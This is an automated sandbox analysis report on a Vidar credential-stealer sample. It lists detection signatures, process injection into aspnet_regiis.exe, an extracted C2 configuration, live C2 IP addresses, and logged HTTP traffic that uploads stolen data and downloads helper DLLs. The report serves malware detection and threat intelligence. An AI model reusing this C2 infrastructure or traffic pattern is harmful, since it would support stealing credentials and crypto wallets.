Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524652
MD5:cc94be13bc24599e326d03ca246a61fa
SHA1:73ed54a021153213ee4823683e4a9376b479d939
SHA256:41ee1357282ed8722ff127ac17ff0831a92a54e72c32a560abeae0d27f5c090e
Tags:exeuser-Bitsight
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CC94BE13BC24599E326D03CA246A61FA)
    • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7620 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 8 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                3.2.aspnet_regiis.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  3.2.aspnet_regiis.exe.400000.0.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    3.2.aspnet_regiis.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      3.2.aspnet_regiis.exe.400000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                        0.2.file.exe.6d771000.7.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          Click to see the 5 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:26:43.493413+020020287653Unknown Traffic192.168.2.75794749.12.197.9443TCP
                          2024-10-03T03:26:44.657800+020020287653Unknown Traffic192.168.2.75794849.12.197.9443TCP
                          2024-10-03T03:26:46.021316+020020287653Unknown Traffic192.168.2.75794949.12.197.9443TCP
                          2024-10-03T03:26:47.472469+020020287653Unknown Traffic192.168.2.75795049.12.197.9443TCP
                          2024-10-03T03:26:48.838450+020020287653Unknown Traffic192.168.2.75795149.12.197.9443TCP
                          2024-10-03T03:26:50.433191+020020287653Unknown Traffic192.168.2.75795249.12.197.9443TCP
                          2024-10-03T03:26:51.659845+020020287653Unknown Traffic192.168.2.75795349.12.197.9443TCP
                          2024-10-03T03:26:54.683434+020020287653Unknown Traffic192.168.2.75795449.12.197.9443TCP
                          2024-10-03T03:26:55.767673+020020287653Unknown Traffic192.168.2.75795549.12.197.9443TCP
                          2024-10-03T03:26:57.026967+020020287653Unknown Traffic192.168.2.75795649.12.197.9443TCP
                          2024-10-03T03:26:58.473481+020020287653Unknown Traffic192.168.2.75795749.12.197.9443TCP
                          2024-10-03T03:27:00.540687+020020287653Unknown Traffic192.168.2.75795849.12.197.9443TCP
                          2024-10-03T03:27:02.447080+020020287653Unknown Traffic192.168.2.75795949.12.197.9443TCP
                          2024-10-03T03:27:04.221912+020020287653Unknown Traffic192.168.2.75796049.12.197.9443TCP
                          2024-10-03T03:27:05.898986+020020287653Unknown Traffic192.168.2.75796149.12.197.9443TCP
                          2024-10-03T03:27:07.438246+020020287653Unknown Traffic192.168.2.75796249.12.197.9443TCP
                          2024-10-03T03:27:10.650406+020020287653Unknown Traffic192.168.2.75796349.12.197.9443TCP
                          2024-10-03T03:27:12.316186+020020287653Unknown Traffic192.168.2.75796449.12.197.9443TCP
                          2024-10-03T03:27:13.692925+020020287653Unknown Traffic192.168.2.75796549.12.197.9443TCP
                          2024-10-03T03:27:15.636741+020020287653Unknown Traffic192.168.2.75796649.12.197.9443TCP
                          2024-10-03T03:27:17.744774+020020287653Unknown Traffic192.168.2.75796849.12.197.9443TCP
                          2024-10-03T03:27:20.454725+020020287653Unknown Traffic192.168.2.75796949.12.197.9443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:26:48.172762+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.757950TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:26:49.661070+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.757951TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:26:46.730519+020020490871A Network Trojan was detected192.168.2.75794949.12.197.9443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T03:27:22.257645+020028032702Potentially Bad Traffic192.168.2.757970147.45.44.10480TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Found malware configuration
                          Source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
                          Multi AV Scanner detection for domain / URL
                          Source: https://49.12.197.9/Virustotal: Detection: 10%Perma Link
                          Source: https://49.12.197.9/sqlp.dllVirustotal: Detection: 11%Perma Link
                          Source: https://49.12.197.9Virustotal: Detection: 10%Perma Link
                          Multi AV Scanner detection for submitted file
                          Source: file.exeVirustotal: Detection: 27%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Roaming\msvcp110.dllJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,3_2_004080A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00408048
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00411E5D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,3_2_0040A7D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC36C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6CC36C80
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:57946 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.7:57947 version: TLS 1.2
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2599259096.000000003A30F000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2594589461.000000002E429000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D762CBD FindFirstFileExW,0_2_6D762CBD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_004014AD

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.7:57951
                          Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.7:57950
                          Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:57949 -> 49.12.197.9:443
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 49.12.197.9 49.12.197.9
                          Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                          Source: Joe Sandbox ViewIP Address: 147.45.44.104 147.45.44.104
                          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57950 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57949 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57953 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57948 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57947 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57952 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57951 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57954 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57957 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57955 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57956 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57958 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57959 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57960 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57961 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57962 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57963 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57966 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57965 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57968 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57964 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57969 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57970 -> 147.45.44.104:80
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6965Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
